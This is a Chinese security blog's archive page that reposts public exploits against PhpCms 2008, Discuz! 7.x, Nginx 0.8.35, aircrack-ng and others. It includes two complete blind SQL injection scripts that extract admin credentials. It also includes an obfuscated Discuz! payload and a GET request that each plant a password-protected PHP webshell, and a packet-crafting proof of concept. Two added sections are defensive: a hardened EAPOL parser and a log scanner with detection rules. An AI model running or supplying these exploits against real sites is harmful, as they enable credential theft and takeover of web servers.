Archive

Archive for the ‘矩阵毒刺’ category

Nginx 0.8.35 Space Character Remote Source Disclosure

May 31, 2010 Chinadu No comments

```text
#################################################################
# Application Info:
# Name: Nginx
# Tested on nginx 0.8.35
# Nginx 0.8.36 and higher are not vulnerable
#################################################################
# Vulnerability Info:
# Type: Remote File Disclosure
# Risk: High
#################################################################
# Vulnerability:
# http://localhost/file.php%20
#################################################################
# Discovered By: Pouya Daneshmand
# Website: http://Pouya.Securitylab.ir
# Contacts: whh_iran[at]securitylab.ir & info@securitylab[dot]ir
###################################################################
```

Category: 矩阵毒刺

PhpCms 2008 Sp3 Blind SQL Injection Exploit (2)

May 8, 2010 Chinadu No comments

```php
<?php
ini_set("max_execution_time",0);
error_reporting(7);

function usage()
{
    global $argv;
    exit(
    "\n--+++============================================================+++--".
    "\n--+++====== PhpCms 2008 Sp3 Blind SQL Injection Exploit========+++--".
    "\n--+++============================================================+++--".
    "\n\n[+] Author: My5t3ry".
    "\n[+] Team: [url]http://www.t00ls.net[/url]".
    "\n[+] Usage: php ".$argv[0]." <hostname> <path>".
    "\n[+] Ex.: php ".$argv[0]." localhost /yp".
    "\n\n");
}

// Builds the injected "where" fragment for one guess; $chs selects which
// column (1 = username, 2 = password, 3 = username length) is tested.
function query($pos, $chr, $chs)
{
    global $prefix;
    switch ($chs){
    case 1:
        $query = "1=1 and if((ascii(substring((select username from ".$prefix."member where groupid=1 limit 0,1),{$pos},1))={$chr}),benchmark(10000000,md5(1)),1)#";
        break;
    case 2:
        $query = "1=1 and if((ascii(substring((select password from ".$prefix."member where groupid=1 limit 0,1),{$pos},1))={$chr}),benchmark(10000000,md5(1)),1)#";
        break;
    case 3:
        $query = "1=1 and if((length((select username from ".$prefix."member where groupid=1 limit 0,1))={$pos}),benchmark(10000000,md5(1)),1)#";
        break;
    }
    $query = str_replace(" ", "/**/", $query);
    $query = urlencode($query);
    return $query;
}

// Sends one guess and treats a response delayed by more than 4 s as "true".
function exploit($hostname, $path, $pos, $chr, $chs)
{
    $chr = ord($chr);
    $conn = fsockopen($hostname, 80);
    $postdata = "q=&action=searchlist&where=".query($pos, $chr, $chs);
    $message = "POST ".$path."/product.php HTTP/1.1\r\n";
    $message .= "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n";
    $message .= "Accept-Language: zh-cn\r\n";
    $message .= "Content-Type: application/x-www-form-urlencoded\r\n";
    $message .= "Accept-Encoding: gzip, deflate\r\n";
    $message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n";
    $message .= "Host: $hostname\r\n";
    $message .= "Content-Length: ".strlen($postdata)."\r\n";
    $message .= "Connection: Close\r\n\r\n";
    $message .= $postdata;
    //echo $message;
    $time_a = time();
    fputs($conn, $message);
    while (!feof($conn))
        $reply .= fgets($conn, 1024);
    $time_b = time();
    fclose($conn);
    //echo $time_b - $time_a."\r\n";
    if ($time_b - $time_a > 4)
        return true;
    else
        return false;
}

function crkusername($hostname, $path, $chs)
{
    global $length;
    $key = "abcdefghijklmnopqrstuvwxyz0123456789";
    $chr = 0;
    $pos = 1;
    echo "[+] username: ";
    while ($pos <= $length)
    {
        if (exploit($hostname, $path, $pos, $key[$chr], $chs))
        {
            echo $key[$chr];
            $chr = 0;
            $pos++;
        }
        else
            $chr++;
    }
    echo "\n";
}

function crkpassword($hostname, $path, $chs)
{
    $key = "abcdef0123456789";
    $chr = 0;
    $pos = 1;
    echo "[+] password: ";
    while ($pos <= 32)
    {
        if (exploit($hostname, $path, $pos, $key[$chr], $chs))
        {
            echo $key[$chr];
            $chr = 0;
            $pos++;
        }
        else
            $chr++;
    }
    echo "\n\n";
}

function lengthcolumns($hostname, $path, $chs)
{
    echo "[+] username length: ";
    $exit = 0;
    $length = 0;
    $pos = 0;
    $chr = 0;
    while ($exit==0)
    {
        if (exploit($hostname, $path, $pos, $chr, $chs))
        {
            $exit = 1;
            $length = $pos;
        }
        else
            $pos++;
    }
    echo $length."\n";
    return $length;
}

// Reads the table prefix back from the SQL error text in the response.
function getprefix($hostname, $path)
{
    echo "[+] prefix: ";
    $conn = fsockopen($hostname, 80);
    $request = "GET {$path}/product.php?q=&action=searchlist&where=%23 HTTP/1.1\r\n";
    $request .= "Host: {$hostname}\r\n";
    $request .= "Connection: Close\r\n\r\n";
    fputs($conn, $request);
    while (!feof($conn))
        $reply .= fgets($conn, 1024);
    fclose($conn);
    preg_match('/FROM `(.+)yp_product/ie',$reply,$match);
    if ($match[1])
        return $match[1];
    else
        return false;
}

if ($argc != 3)
    usage();

$prefix="";
$hostname = $argv[1];
$path = $argv[2];
$prefix = getprefix($hostname, $path);
if ($prefix)
{
    echo $prefix."\r\n";
    $length = lengthcolumns($hostname, $path, 3);
    crkusername($hostname, $path, 1);
    crkpassword($hostname, $path, 2);
}
else
{
    exit("Exploit failed");
}
?>
```

PhpCms 2008 Sp3 Blind SQL Injection Exploit (1)

May 8, 2010 Chinadu No comments

```php
<?php
ini_set("max_execution_time",0);
error_reporting(7);

function usage()
{
    global $argv;
    exit(
    "\n--+++============================================================+++--".
    "\n--+++====== PhpCms 2008 Sp3 Blind SQL Injection Exploit========+++--".
    "\n--+++============================================================+++--".
    "\n\n[+] Author: My5t3ry".
    "\n[+] Team: [url]http://www.t00ls.net[/url]".
    "\n[+] Usage: php ".$argv[0]." <hostname> <path>".
    "\n[+] Ex.: php ".$argv[0]." localhost /yp".
    "\n\n");
}

// Builds the injected "where" fragment; unlike version (2) this variant is
// boolean-based and reads the result from the page content, not from timing.
function query($pos, $chr, $chs)
{
    global $prefix;
    switch ($chs){
    case 0:
        $query = "#";
        break;
    case 1:
        $query = " ascii(substring((select username from ".$prefix."member where groupid=1 limit 0,1),{$pos},1))={$chr}#";
        break;
    case 2:
        $query = " ascii(substring((select password from ".$prefix."member where groupid=1 limit 0,1),{$pos},1))={$chr}#";
        break;
    case 3:
        $query = " length((select username from ".$prefix."member where groupid=1 limit 0,1))={$pos}#";
        break;
    }
    $query = str_replace(" ", "/**/", $query);
    $query = urlencode($query);
    return $query;
}

// Sends one guess and returns the raw HTTP response.
function exploit($hostname, $path, $pos, $chr, $chs)
{
    $chr = ord($chr);
    $conn = fsockopen($hostname, 80);
    //print_r($conn);
    /*if (!$conn){
        exit("\r\n[-] No response from $conn");
    }*/
    $postdata = "q=&action=searchlist&where=".query($pos, $chr, $chs);
    $message = "POST ".$path."/product.php HTTP/1.1\r\n";
    $message .= "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n";
    $message .= "Accept-Language: zh-cn\r\n";
    $message .= "Content-Type: application/x-www-form-urlencoded\r\n";
    $message .= "Accept-Encoding: gzip, deflate\r\n";
    $message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n";
    $message .= "Host: $hostname\r\n";
    $message .= "Content-Length: ".strlen($postdata)."\r\n";
    $message .= "Connection: Close\r\n\r\n";
    $message .= $postdata;
    //echo $message;
    fputs($conn, $message);
    while (!feof($conn))
        $reply .= fgets($conn, 1024);
    fclose($conn);
    return $reply;
}

// A non-empty <span class="time"> in the result list marks a true condition.
function crkusername($hostname, $path, $chs)
{
    global $length;
    $key = "abcdefghijklmnopqrstuvwxyz0123456789";
    $chr = 0;
    $pos = 1;
    echo "[+] username: ";
    while ($pos <= $length)
    {
        $response = exploit($hostname, $path, $pos, $key[$chr], $chs);
        preg_match ("/<span class=\"time\">(.+)<\/span><\/strong>/i", $response, $match);
        if (strlen(trim($match[1])) != 0)
        {
            echo $key[$chr];
            $chr = 0;
            $pos++;
        }
        else
            $chr++;
    }
    echo "\n";
}

function crkpassword($hostname, $path, $chs)
{
    $key = "abcdef0123456789";
    $chr = 0;
    $pos = 1;
    echo "[+] password: ";
    while ($pos <= 32)
    {
        $response = exploit($hostname, $path, $pos, $key[$chr], $chs);
        preg_match ("/<span class=\"time\">(.+)<\/span><\/strong>/i", $response, $match);
        if (strlen(trim($match[1])) != 0)
        {
            echo $key[$chr];
            $chr = 0;
            $pos++;
        }
        else
            $chr++;
    }
    echo "\n\n";
}

function lengthcolumns($hostname, $path, $chs)
{
    echo "[+] username length: ";
    $exit = 0;
    $length = 0;
    $pos = 1;
    $chr = 0;
    while ($exit==0)
    {
        $response = exploit($hostname, $path, $pos, $chr, $chs);
        preg_match ("/<span class=\"time\">(.+)<\/span><\/strong>/i", $response, $match);
        if (strlen(trim($match[1])) != 0)
        {
            $exit = 1;
            $length = $pos;
        }
        else
            $pos++;
    }
    echo $length."\n";
    return $length;
}

// Reads the table prefix back from the SQL error text in the response.
function getprefix($hostname, $path, $chs)
{
    echo "[+] prefix: ";
    $pos = 0;
    $chr = 0;
    $response = exploit($hostname, $path, $pos, $chr, $chs);
    preg_match('/FROM `(.+)yp_product/ie',$response,$match);
    if ($match[1])
        return $match[1];
    else
        return false;
}

if ($argc != 3)
    usage();

$prefix="";
$hostname = $argv[1];
$path = $argv[2];
$prefix = getprefix($hostname, $path, 0);
if ($prefix)
{
    echo $prefix."\r\n";
    $length = lengthcolumns($hostname, $path, 3);
    crkusername($hostname, $path, 1);
    crkpassword($hostname, $path, 2);
}
else
{
    exit("\r\n[-] Exploit failed");
}
?>
```

Remote Exploit Against the Aircrack-NG Tools svn r1675

April 15, 2010 Chinadu No comments

```python
#!/usr/bin/env python
# -*- coding: UTF-8 -*-
''' A remote-exploit against the aircrack-ng tools. Tested up to svn r1675.

The tools' code responsible for parsing IEEE802.11-packets assumes the
self-proclaimed length of a EAPOL-packet to be correct and never to exceed
a (arbitrary) maximum size of 256 bytes for packets that are part of the
EAPOL-authentication. We can exploit this by letting the code parse packets
which:
a) proclaim to be larger than they really are, possibly causing the code
   to read from invalid memory locations while copying the packet;
b) really do exceed the maximum size allowed and overflow data structures
   allocated on the heap, overwriting libc's allocation-related
   structures. This causes heap-corruption.

Both problems lead either to a SIGSEGV or a SIGABRT, depending on the
code-path. Careful layout of the packet's content can even possibly alter the
instruction-flow through the already well known heap-corruption paths
in libc. Playing with the proclaimed length of the EAPOL-packet and the
size and content of the packet's padding immediately end up in various
assertion errors during calls to free(). This reveals the possibility to
gain control over $EIP.

Given that we have plenty of room for payload and that the tools are
usually executed with root-privileges, we should be able to have a
single-packet-own-everything exploit at our hands. As the attacker can
cause the various tools to do memory-allocations at his will (through
faking the appearance of previously unknown clients), the resulting
exploit-code should have a high probability of success.

The demonstration-code below requires Scapy >= 2.x and Pyrit >= 0.3.1-dev
r238 to work. It generates a pcap-file with a single packet of the following
content:

0801000000DEADC0DE0000DEADC0DE010000000000000000AAAA03000000888E0103FDE8FE0
108000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000043616E20492068617320736F6D65206D6F6172
3F

03/27/2010, Lukas Lueg, lukas.lueg@gmail.com
'''

import cpyrit.pckttools
import scapy.layers

# A IEEE802.11-packet with LLC- and SNAP-header, looking like the second
# phase of a EAPOL-handshake (the confirmation). The size set in the EAPOL-
# packet will cause an overflow of the "eapol"-field in struct WPA_ST_info and
# struct WPA_hdsk.
# We have plenty of room for exploit-payload as most of the fields in the
# EAPOL_Key-packet are not interpreted. As far as I can see, the adjacent
# heap structure will be overwritten by the value of EAPOL_WPAKey.Nonce in
# case of airodump-ng...
pckt = scapy.layers.dot11.Dot11(addr1='00:de:ad:c0:de:00', \
                                addr2='00:de:ad:c0:de:01', \
                                FCfield='to-DS') \
       / scapy.layers.dot11.LLC() \
       / scapy.layers.dot11.SNAP() \
       / scapy.layers.l2.EAPOL(len=65000) \
       / cpyrit.pckttools.EAPOL_Key() \
       / cpyrit.pckttools.EAPOL_WPAKey(KeyInfo = 'pairwise+mic') \
       / scapy.packet.Padding(load='Can I has some moar?')

if __name__ == '__main__':
    print "Packet's content:"
    print ''.join("%02X" % ord(c) for c in str(pckt))
    filename = 'aircrackng_exploit.cap'
    print "Writing to '%s'" % filename
    writer = cpyrit.pckttools.Dot11PacketWriter(filename)
    writer.write(pckt)
    writer.close()
    print 'Done'
```
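The two defects the advisory above describes (a declared EAPOL length larger than the bytes actually received, and an honest length larger than the fixed 256-byte buffer) are both length-validation failures at the same point in the parser. The following is an added example, written for this archive and not part of the aircrack-ng project or of Lukas Lueg's code: it builds a frame with the same 802.11/LLC/SNAP/EAPOL layout as the dump in the advisory and shows the two checks a hardened parser performs before copying. The 256-byte bound is taken from the advisory; the frame builder, the function names (`build_eapol_frame`, `naive_copy_length`, `parse_eapol`, `check_frame`) and the body contents are assumptions made for the demonstration.

```python
import struct

# Layout of the frame described in the advisory: 802.11 data header, LLC/SNAP, EAPOL.
DOT11_HDR_LEN = 24       # three-address data frame header
LLC_SNAP_LEN = 8         # AA AA 03 + OUI (3 bytes) + EtherType (2 bytes)
EAPOL_HDR_LEN = 4        # version (1), packet type (1), body length (2, big-endian)
EAPOL_BUF_MAX = 256      # fixed buffer size the advisory says the tools assumed
EAPOL_ETHERTYPE = b'\x88\x8e'


class EapolLengthError(ValueError):
    """Raised when the declared EAPOL length is inconsistent with the frame."""


def build_eapol_frame(declared_len, body):
    """Constructed test frame: 802.11 data frame (to-DS) + LLC/SNAP + EAPOL header
    announcing `declared_len`, followed by `body`. The addresses mirror the
    advisory's dump; the body content is a placeholder."""
    dot11 = (b'\x08\x01\x00\x00'                 # frame control (data, to-DS) + duration
             + bytes.fromhex('00deadc0de00')      # addr1
             + bytes.fromhex('00deadc0de01')      # addr2
             + bytes(6)                           # addr3
             + b'\x00\x00')                       # sequence control
    llc_snap = b'\xaa\xaa\x03' + b'\x00\x00\x00' + EAPOL_ETHERTYPE
    eapol_hdr = struct.pack('!BBH', 1, 3, declared_len)   # version 1, type 3 = EAPOL-Key
    return dot11 + llc_snap + eapol_hdr + body


def naive_copy_length(frame):
    """The trusting behaviour the advisory describes: take the declared length at
    face value. Returns how many bytes past the end of the frame such a copy
    would read (0 when the declaration is honest)."""
    off = DOT11_HDR_LEN + LLC_SNAP_LEN
    declared = struct.unpack('!H', frame[off + 2:off + 4])[0]
    present = len(frame) - off - EAPOL_HDR_LEN
    return max(0, declared - present)


def parse_eapol(frame):
    """Hardened parser: accept the EAPOL body only if the declared length is
    covered by bytes actually present and the whole packet fits the buffer."""
    if len(frame) < DOT11_HDR_LEN + LLC_SNAP_LEN + EAPOL_HDR_LEN:
        raise EapolLengthError('frame too short for 802.11 + LLC/SNAP + EAPOL header')
    if (frame[0] >> 2) & 0x3 != 2:
        raise EapolLengthError('not an 802.11 data frame')
    llc = frame[DOT11_HDR_LEN:DOT11_HDR_LEN + LLC_SNAP_LEN]
    if llc[:3] != b'\xaa\xaa\x03' or llc[6:] != EAPOL_ETHERTYPE:
        raise EapolLengthError('not an EAPOL (0x888e) payload')
    off = DOT11_HDR_LEN + LLC_SNAP_LEN
    version, ptype, declared = struct.unpack('!BBH', frame[off:off + EAPOL_HDR_LEN])
    body = frame[off + EAPOL_HDR_LEN:]
    # (a) a declared length larger than the bytes present would make a
    #     trusting copy read past the packet
    if declared > len(body):
        raise EapolLengthError(f'declared length {declared} exceeds {len(body)} bytes present')
    # (b) a packet larger than the fixed buffer would overflow it on the heap
    if EAPOL_HDR_LEN + declared > EAPOL_BUF_MAX:
        raise EapolLengthError(
            f'EAPOL packet of {EAPOL_HDR_LEN + declared} bytes exceeds the {EAPOL_BUF_MAX}-byte buffer')
    return {'version': version, 'type': ptype, 'length': declared, 'body': body[:declared]}


def check_frame(frame):
    """Return 'ok' or the reason the frame was rejected."""
    try:
        parse_eapol(frame)
        return 'ok'
    except EapolLengthError as exc:
        return str(exc)


if __name__ == '__main__':
    oversized = build_eapol_frame(65000, b'\xfe' + bytes(94))   # case (a): lies about its size
    print('declared 65000, 95 present ->', check_frame(oversized),
          '| bytes a trusting copy would over-read:', naive_copy_length(oversized))
    too_big = build_eapol_frame(300, bytes(300))                # case (b): honest but too large
    print('honest 300-byte body       ->', check_frame(too_big))
    sane = build_eapol_frame(95, b'\xfe' + bytes(94))
    print('honest 95-byte body        ->', check_frame(sane))
```

Both checks are cheap and must run before any copy into the fixed-size structure; rejecting the frame is the right outcome here, since a handshake packet that fails either check cannot be a valid EAPOL-Key message in the first place.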

Category: 矩阵毒刺

DedeCms v5.5 0day

March 10, 2010 Chinadu No comments

There is no official patch yet, but I expect one soon.
On success it generates a one-line webshell t.php under data/cache,
password t. The latest official GBK and UTF-8 builds have this vulnerability.
The distinctive feature of this exp is that no log entry is left when t.php is created.

Read more...

Category: 矩阵毒刺

MyBB 1.4 admin remote code execution vulnerability

January 18, 2010 Chinadu No comments

by flyh4t
team: http://www.80vul.com
date: 2010-01-10

Tested version: MyBB 1.44.11

[1] Vulnerability analysis

Around line 336 of index.php the code is as follows:

```php
// index.php, around line 336
$plugins->run_hooks("index_end");
// an eval() call appears here; note its argument
eval("\$index = \"".$templates->get("index")."\";");
output_page($index);
```

To see whether the content passed to eval() can be controlled, next find the templates class and look at the definition of get():

Read more...

Category: 矩阵毒刺

Discuz! 7.1 / 7.2 remote code execution vulnerability exploit

January 7, 2010 Chinadu No comments

1. Register a new user
2. The exp code is as follows:

```html
<form method="post" action=" http://www.xxx.com/bbs/misc.php" enctype="multipart/form-data">
Thread ID; any existing thread will do: <input type="text" name="tid" value="1" />
<input type="hidden" name="action" value="imme_binding" />
<input type="hidden" name="response[result]" value="1:2" />
<input type="hidden" name="scriptlang[1][2]" value="${${eval(chr(102).chr(112).chr(117).chr(116).chr(115).chr(40).
chr(102).chr(111).chr(112).chr(101).chr(110).chr(40).chr(39).
chr(102).chr(111).chr(114).chr(117).chr(109).chr(100).
chr(97).chr(116).chr(97).chr(47).chr(99).chr(97).
chr(99).chr(104).chr(101).chr(47).chr(117).
chr(115).chr(101).chr(114).chr(103).chr(114).
chr(111).chr(117).chr(112).chr(95).chr(48).
chr(49).chr(46).chr(112).chr(104).chr(112).chr(39).
chr(44).chr(39).chr(119).chr(39).chr(41).chr(44).
chr(39).chr(60).chr(63).chr(112).chr(104).chr(112).
chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).
chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).
chr(91).chr(99).chr(109).chr(100).chr(93).
chr(41).chr(63).chr(62).chr(39).chr(41).chr(59))}}" />
<input type="submit" name="topicsubmit" value="提交" class="submit" />
</form>
```

After decoding the chr() calls it reads:

```
value="${${evalfputs(fopen('forumdata/cache/usergroup','w'),'<?php eval($_POST[cmd])?>');
```

Save it as an html file.

Open it and click submit; a one-line shell file forumdata/cache/usergroup_01.php is generated, password cmd.

Second method:

Direct GET, using the following request:

```
misc.php?action=imme_binding&response[result]=aa:b&scriptlang[aa][b]={${fputs(fopen(base64_decode(Yy5waHA),w),
base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x))}}
```

Generates C.PHP in the web root, password C.

Temporary fix:

Add at the top of common.inc.php:

```php
$response=$scriptlang=array();
```

Official patch release:

http://www.discuz.net/thread-1537673-1-1.html
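Three of the posts in this archive (the Nginx 0.8.35 trailing-space disclosure, the PhpCms blind SQL injection scripts and the Discuz! `${${...}}` injection above) leave a recognisable trace in the request target, so one access-log scanner can flag all of them. The following is an added example written for this archive; it is not code from the blog, from the exploit authors or from any of the affected projects. It assumes a combined-format access log, URL-decodes each target twice and replaces the `/**/` comments the PhpCms script substitutes for spaces before matching. The log lines, the client addresses and the `prefix_member` table name are constructed for the demonstration. Note the caveat a defender needs: the PhpCms scripts send their payload in a POST body, which a standard access log does not record, so the sample shows the GET form (the scripts' prefix lookup uses GET); for POST bodies the same rules belong in a WAF or request-body logging.

```python
import re
from urllib.parse import unquote

# Combined-format access-log line: client, timestamp, request line, status.
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Each rule is (name, pattern) and is matched against the normalised target.
RULES = (
    # Nginx 0.8.35 post: a .php script name followed by an (encoded) trailing space
    ('nginx-trailing-space-disclosure', re.compile(r'\.php\s+(?:\?|$)')),
    # PhpCms posts: time-based blind injection built on benchmark()/sleep()
    ('time-based-blind-sqli', re.compile(r'\b(?:benchmark|sleep)\s*\(', re.I)),
    # Discuz! post: ${${...}} variable-variable injection calling eval/fputs/fopen
    ('php-variable-injection',
     re.compile(r'\$\{\s*\$\{|\$\{[^}]*\b(?:eval|fputs|fopen)\s*\(', re.I)),
)


def normalise(target):
    """URL-decode twice (payloads are sometimes double-encoded) and turn MySQL
    inline comments back into the spaces they stand in for."""
    decoded = unquote(unquote(target))
    return re.sub(r'/\*.*?\*/', ' ', decoded)


def scan_line(line):
    """Return a list of (rule name, client ip, status) hits for one log line."""
    m = LOG_LINE.match(line)
    if not m:
        return []
    target = normalise(m.group('target'))
    return [(name, m.group('ip'), m.group('status'))
            for name, pattern in RULES if pattern.search(target)]


def scan_log(text):
    """Scan a whole log (one request per line) and collect every hit in order."""
    return [hit for line in text.splitlines() if line.strip() for hit in scan_line(line)]


# Constructed sample log: the three attack shapes from the posts plus two benign requests.
SAMPLE_LOG = r'''
192.0.2.10 - - [31/May/2010:10:00:01 +0800] "GET /index.php%20 HTTP/1.1" 200 4120 "-" "curl/7.19"
192.0.2.11 - - [08/May/2010:11:02:17 +0800] "GET /yp/product.php?q=&action=searchlist&where=1%3D1/**/and/**/if%28%28length%28%28select/**/username/**/from/**/prefix_member%29%29%3D5%29%2Cbenchmark%2810000000%2Cmd5%281%29%29%2C1%29%23 HTTP/1.1" 200 2210 "-" "-"
192.0.2.12 - - [07/Jan/2010:09:15:44 +0800] "GET /bbs/misc.php?action=imme_binding&response%5Bresult%5D=aa:b&scriptlang%5Baa%5D%5Bb%5D=%7B%24%7Bfputs%28fopen%28x%2Cw%29%2Cy%29%7D%7D HTTP/1.1" 200 0 "-" "-"
198.51.100.5 - - [07/Jan/2010:09:16:02 +0800] "GET /bbs/viewthread.php?tid=1 HTTP/1.1" 200 8821 "-" "Mozilla/5.0"
198.51.100.6 - - [07/Jan/2010:09:17:30 +0800] "POST /yp/product.php HTTP/1.1" 200 2210 "-" "Mozilla/4.0"
'''

if __name__ == '__main__':
    for rule, ip, status in scan_log(SAMPLE_LOG):
        print(f'{ip:15} {status} {rule}')
```

The time-based rule is deliberately broad: a single `benchmark(` in a query string is already abnormal for these applications, and the scripts above confirm each guessed character with one such request, so a burst of them from one client is the signature to alert on.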

Category: 矩阵毒刺

Microsoft IIS 5.0 FTP Server Remote Stack Overflow Exploit (Chinese/English universal version)

September 20, 2009 Chinadu No comments

Binds port 4444; tested on Windows 2000 CN + SP4; requires a user who can create directories. If the offset address is not universal, modify it yourself.

Read more...

Category: 矩阵毒刺

Adobe Acrobat/Reader < 7.1.1/8.1.3/9.1 Collab getIcon Universal Exploit

September 4, 2009 Chinadu No comments

#!/usr/bin/env python
#
# *** Acrobat Reader - Collab getIcon universal exploiter ***
# evil_pdf.py, tested on Operating Systems:
# Windows XP SP3 English/French
# Windows 2003 SP2 English
# with Application versions:
# Adobe Reader 9.0.0/8.1.2 English/French
# Test methods:
# Standalone PDF, embedded PDF in Firefox 3.0.13 and Internet Explorer 7
# 24/06/2009 - Created by Ivan Rodriguez Almuina (kralor). All rights reserved.
# [Coromputer] raised from the ashes.
#

http://www.coromputer.net/CVE-2009-0927_package.zip

back: http://milw0rm.com/sploits/2009-CVE-2009-0927_package.zip

# milw0rm.com [2009-09-03]

Category: 矩阵毒刺

Make Windows dial up automatically at boot

September 4, 2009 Chinadu 2 comments

1. Copy and paste the following code into Notepad
2. Change “宽带连接” in the code to the name of the dial-up connection you created, and change the account and password to your ADSL account and password
3. Save the code as 拨号.vbs; double-clicking it now dials the connection
4. Drag “拨号.vbs” into the Startup folder of the Start menu
5. Done.

Read more...

Category: 矩阵毒刺